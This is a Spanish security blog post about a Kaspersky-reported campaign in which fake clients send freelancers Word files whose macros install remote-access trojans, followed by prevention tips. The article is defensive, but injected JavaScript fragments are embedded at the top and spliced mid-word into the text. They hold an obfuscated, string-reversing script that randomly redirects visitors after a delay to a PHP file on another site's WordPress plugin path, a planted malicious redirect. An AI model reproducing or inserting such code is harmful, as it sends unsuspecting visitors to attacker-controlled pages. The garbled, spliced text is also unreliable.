Así es el malware escondido en Word dirigido a trabajadores autónomos
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tonomos.jpeg?x32709″ width=”1280″ height=”853″ /></p>
<p>Alerta: clientes ficticios ciberatacan autónomos con archivos de Word</p>
<p>Desde Kaspersky han alertado sobre la proliferación de ciberataques a trabajadores autónomos mediante archivos de Word infectados con malware que instalan troyanos para dirigir sus equipos de forma remota.</p>
<p>Es habitual que los trabajadores independientes, autónomos y freelance empleen plataformas digitales específicas para buscar empleo, obtener proyec<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tos o poner su portfolio a disposición de posibles clientes y empresas. Aprovechando la gran afluencia de webs como Fiverr o Freelancer, un grupo de ciberdelincuentes ha diseñado una campaña para inyectar código malicioso en los dispositivos de los autónomos mediante un documento de Word, tal y como ha alertado una investigación de la compañía Kaspersky.
Nueva campaña de phishing que roba nuestra contraseña de WordPress
Los usuarios registrados en este tipo de plataformas eran contactados por parte de los cibercriminales mediante un correo electrónico que solicitaba un servicio profesional supuestamente descrito en el archivo adjunto. Esta información se hallaba contenida en el interior de un archivo .doc no ejecutable, considerado como fiable por parte del freelance, que al abrirlo se topaba con la desagradable sorpresa de un malware instalado en el equipo.
Este tipo de malware se oculta en macros utilizados en archivos de MS Office. Al abrir esta clase de archivos, al usuario se le pide activar macros y muchos de ellos así lo consienten, propiciando la instalación del troyano de acceso en remoto en el dispositivo. A partir de entonces, los ciberdelincuentes pueden acceder a toda clase de información sensible contenida en el ordenador, como las credenciales de acceso al correo electrónico y a las redes sociales o los datos bancarios.
Plantillas de facturas de Excel gratis para descargar
Tal y como alertan desde la compañía de ciberseguridad, el foco geográfico de esta campaña de malware ha sido hasta el momento Latinoamérica, aunque no se descarta que el robo de datos se extienda a Europa y sobre todo a España, al tratarse de un país de habla hispana.
Cómo es posible prevenir ciberataques de este estilo
Los consejos de Kaspersky para evitar esta clase de ciberataques pasan por no instalar ninguna clase de software, ya que aunque pueda tratarse de un psoible cliente, tras el documento puede esconderse un hacker u organización cibercriminal. Tampoco se recomienda abrir archivos .exe o cualquier otro documento ejecutable, que podría contener código malicioso.
Para finalizar, si eres freelance tampoco actives macros -archivos ejecutables ocultos- en documentos de Microsoft Word, hojas de cálculo de Excel, presentaciones de PowerPoint u otros formatos.
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.